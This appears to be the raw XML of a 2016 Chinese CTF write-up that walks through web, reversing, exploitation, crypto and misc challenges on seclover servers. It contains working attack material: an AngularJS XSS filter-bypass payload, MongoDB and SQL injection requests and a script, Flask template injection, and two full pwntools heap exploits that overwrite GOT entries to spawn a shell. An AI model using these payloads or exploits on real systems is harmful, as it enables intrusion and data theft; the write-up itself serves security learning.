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Web渗透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 xml:space="preserve">Web1 Up!Up!Up! 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http://www.wooyun.org/bugs/wooyun-2010-0125982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随便上传一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>jpg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burp改multipart/form-data为Multipart/form-data，后缀为Php即可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Web 2 Can You Hit Me？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有</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>AngularJS,可xss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http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html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{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}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有过滤，绕过一下就好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{{'a'.coonnstructor.prototype.charAt=[].join;$eonval('x=1} } };alonert(1)//');}}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Web3 Legend？Legend！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>monogodb的注入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http://806bddce.seclover.com/news.php?newsid=1%27});return%20{title:tojson(db.getCollectionNames())};//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[ "news", "system.indexes", "user" ]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http://806bddce.seclover.com/news.php?newsid=1%27});return%20{title:tojson(db.user.find()[0])};//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{ "_id" : ObjectId("56cbcf6d3a677c17278b456d"), "username" : "admin", "password" : "*&amp;98*hjhjyu", "email" : "loverctf@126.com" }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用这个密码登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>126邮箱，邮件里有flag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web4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>Flag-Man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发现是</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>flask的，觉得有注入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name改为{{1+1}}一试果然有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随便试试，用户名改为</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>{{app.flagman}}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直接出结果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web5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>AFSRC-Market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添加购物车那有二次注入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测试</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>(1),和(0)在lastcost显示不一样，结果为0才会显示，所以盲注一个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import urllib2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import re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sql="( (ord(substr((select flag from flag),1,1))-84)  )"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opener = urllib2.build_opener()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opener.addheaders.append(('Cookie', 'PHPSESSID=dk0e6v69b5fditumtfl5iq4bo3'))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 = opener.open("http://edb24e7c.seclover.com/add_cart.php?id=0x"+sql.encode('hex'))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f.read()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 = opener.open("http://edb24e7c.seclover.com/userinfo.php")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result=(f.read())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mode = re.compile(r'&lt;p&gt;The Last cost: \w+&lt;/p&gt;')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result=mode.findall(result)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result=result.__len__()==1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result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得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>http://edb24e7c.seclover.com/2112jb1njIUIJ__tr_R/tips.txt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提示要</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>addmoney，token可以计算，盐不知道，发现不刷新验证码不变，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那懒得做了也困了，放脚本直接爆，主办方肯定没那么好心，猜就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>5位第一位是8，若干小时候爆出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salt是8b76d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 w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>二进制逆向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RE1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只需要在</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>native函数最后函数比较的地方下个断点就可以看到flag了。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 w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>漏洞分析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pwn1 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程序使用自己实现的内存管理系统，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>sort的时候更新number的函数中存在off-by-one</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>漏洞，可以改写后面一块内存的第一个DWORD。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通过构造，使得</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>update number修改后一块数组结构的size大小为0x40000003，然后reload后一块的数组，这时(size+1)*4发生上溢结果是16所以分配时不会出现错误，但size为0x40000003使得可以update之后的任意内存，通过update number改写内存管理的元数据，让第一个8字节块空闲且指向strcmp_got - 8，接着执行sort分配1个元素就能够取得strcmp_got - 8的位置，随后利用off-by-one leak strcmp的地址并改写为system，退出到主菜单输入/bin/sh即可拿到shell。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exploit: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#!/usr/bin/env python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coding: utf-8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from pwn import *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def add_sort(number, sort=False, overflow=None):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p.sendline(str(number))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for i in range(number):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</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:tab/>
        <w:t>p.sendline(str(number*10))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if sort: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</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:tab/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if overflow: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</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:tab/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</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:tab/>
        <w:t>p.sendline(str(number))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</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:tab/>
        <w:t>p.sendline(str(overflow))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ab/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strcmp_got = 0x804d03c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puts_got = 0x804d030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libc_strcmp = 0x77c30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libc_system = 0x3bc90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ssoffset = libc_system - libc_strcmp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chunk8 = 0x805e088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array16 = 0x804e044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offset = (chunk8 - array16) / 4 + 2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 = remote('pwn.lab.seclover.com', 11111)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add_sort(1)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add_sort(5)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add_sort(7, True)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add_sort(5, False, 0x40000003)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change chunk to strcmp_got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p.sendline('reload')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p.sendline(str(offset))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p.sendline(str(strcmp_got - 8))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p.recvuntil('result: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strcmp = int(p.recvuntil('\n', drop=True))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system = strcmp + ssoffset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strcmp @ %#x' % (strcmp &amp; 0xffffffff)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system @ %#x' % (system &amp; 0xffffffff)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p.sendline(str(system))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p.sendline('/bin/sh')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p.interactive()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 xml:space="preserve">pwn2 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仍然是</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>off-by-one的漏洞，但是此次数组的第1个元素保存 size ^ canary 的值以检测溢出，canary在程序开始时随机生成。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由于不能直接溢出数组的第</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>0个size元素，只能溢出history结构的第一个指针，再通过history命令能够进行任意内存的leak。首先leak出canary、堆地址、_IO_getc的地址，接着事先分配一个array，在其中放置_IO_getc的地址和system的地址，然后在数组中伪造一个fake array，其size为0x40000002，第1个元素为0x40000002 ^ canary，再溢出后面一个history结构的指针指向这个fake array，执行reload命令即可得到与pwn1一</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>样的效果，接着修改元数据指向</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>strtol_got - 12，由于_IO_getc的got在strtol_got的上一个如果破坏程序就无法读入，所以选择reload事先布置好的array，借用memcpy将_IO_getc的地址和system的地址写入，使得strtol的got被改写为system而_IO_getc保持不变，接着直接输入/bin/sh即可得到shell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exp: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#!/usr/bin/env python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coding: utf-8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from pwn import *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strtol_got = 0x804c01c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getc_got = 0x804c018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canary_addr = 0x804c04c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magic_size = 0x40000002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remote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libc_getc = 0x642c0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libc_system = 0x3bc90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soffset = libc_system - libc_getc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target1 = 0x8489118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target2 = 0x84890e8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vul_array = 0x84790b0 + 8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offset1 = (target1 - vul_array) / 4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offset2 = (target2 - vul_array) / 4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#p = process('./pwn2')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 = remote('pwn.lab.seclover.com', 22222)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p.send('10\n10\n')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p.recvuntil('is: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leak heap address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p.recvuntil('result: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array1_addr = int(p.recvuntil('\n', drop=True)) &amp; 0xffffffff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fake_array_addr = array1_addr + 16 + 8 + 24 + 24 + 24 + 8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copy_array_addr = fake_array_addr + 16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first array @ %#x' % array1_addr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fake array will @ %#x' % fake_array_addr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overwrite to get canary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p.sendline(str(canary_addr))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get canary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p.sendline('history')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p.recvuntil('Len =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canary = int(p.recvuntil(',', drop=True)) &amp; 0xffffffff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canary = %#x' % canary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leak getc got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p.send('10\n10\n')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p.sendline('is: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p.sendline(str(getc_got))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p.sendline('history')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p.recvuntil('ID = 1, Len = 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getc = int(p.recvuntil(',', drop=True))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system = getc + soffset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_IO_getc @ %#x' % (getc &amp; 0xffffffff)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print '[+] system @ %#x' % (system &amp; 0xffffffff)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prepare for reload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p.sendline('20\n20\n')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p.sendline(str(getc))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p.sendline(str(system))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repeat the process to ensure the history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p.sendline('20\n20\n')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p.sendline(str(getc))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p.sendline(str(system))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p.sendline('sort')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p.send('20\n20\n')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p.sendline('3')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p.sendline(str(magic_size))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p.sendline(str(magic_size ^ canary))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p.sendline(str(fake_array_addr))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# reload #1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p.sendline('reload')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p.sendline('1')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p.sendline(str(offset1 + 1))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p.sendline('0')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p.sendline(str(offset1 + 2))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p.sendline(str(strtol_got - 12))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p.sendline(str(offset2 + 2))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p.sendline(str(copy_array_addr))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p.sendline('7')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# reload #2 overwrite strtol got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p.recvuntil('_CMD_$')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p.sendline('reload')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p.sendline('2')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p.sendline('/bin/sh')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p.interactive()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 w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>密码学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HEHEDA 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因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>key只影响当前位，所以可以逐个暴力，先暴出key，但最后一位不太确定。，再会对最后一位暴一遍，应该有好几种可能，逐个试一遍，同样的方法，再暴出flag，即可得。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB16A9" w:rsidRDefault="00DB16A9" w:rsidP="00DB16A9">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00933442" w:rsidRPr="00933442" w:rsidRDefault="00DB16A9" w:rsidP="00DB16A9">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>Hungry Game</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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一个用</w:t>
      </w:r>
      <w:r w:rsidRPr="00933442">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>websocket和canvas做的游戏。看game.js源码，可以看到游戏分为几层。funpos数组定义了不同层时候按空格执行的内容。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直接劫持流量替换掉</w:t>
      </w:r>
      <w:r w:rsidRPr="00933442">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>game.js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第一层：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直接进入第二层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第二层：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修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00933442">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>fakedoor为nextdoor进入下一层。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第三层：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需要砍树修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00933442">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>onwood函数，反复多次发送数据砍树到9999，开门进入下一层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第四层：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和第三层类似</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00933442" w:rsidRPr="00933442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第五册：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB16A9" w:rsidRDefault="00933442" w:rsidP="00933442">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933442">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要打</w:t>
      </w:r>
      <w:r w:rsidRPr="00933442">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>boss，修改attack时发送的数据，坐标改为boss所在位置而不是自己所在位置。攻击15次得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00933442" w:rsidRPr="00DB16A9" w:rsidRDefault="00933442" w:rsidP="00933442">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DB16A9" w:rsidRPr="00DB16A9" w:rsidRDefault="00DB16A9" w:rsidP="00DB16A9">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>Speed Data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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简直脑洞，发现好多</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>20 09 像8bit，0101的感觉，提出来一看就是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import re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str = 'xxxxxxxxxxxxxxxxxxxxx'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mode = re.compile(r'[092]{16}')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result=mode.findall(str)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lastRenderedPageBreak/>
        <w:t>a=""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>for element in result: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if (element!='0000000000000000'):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    element=element.replace("20", "0");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    element=element.replace("09", "1");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    element=chr(int(element,2))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       a+=element</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB16A9" w:rsidRPr="00DB16A9" w:rsidRDefault="00DB16A9" w:rsidP="00DB16A9">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB16A9">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t xml:space="preserve">print a </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F834BD" w:rsidRPr="00DB16A9" w:rsidRDefault="00F834BD" w:rsidP="00DB16A9">
      <w:pPr>
        <w:snapToGrid w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F834BD" w:rsidRPr="00DB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9"/>
    <w:rsid w:val="00933442"/>
    <w:rsid w:val="00DB16A9"/>
    <w:rsid w:val="00F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C4A2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{755CE8FD-449D-4D9F-A9E7-85D8AADF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16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16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16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6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16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16A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1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6A9"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-tab-span">
    <w:name w:val="apple-tab-span"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00D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1119</Words>
  <Characters>6381</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>53</Lines>
  <Paragraphs>14</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>火日攻天工作室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火日攻天</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>火日攻天</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-02-29T08:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-02-29T11:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>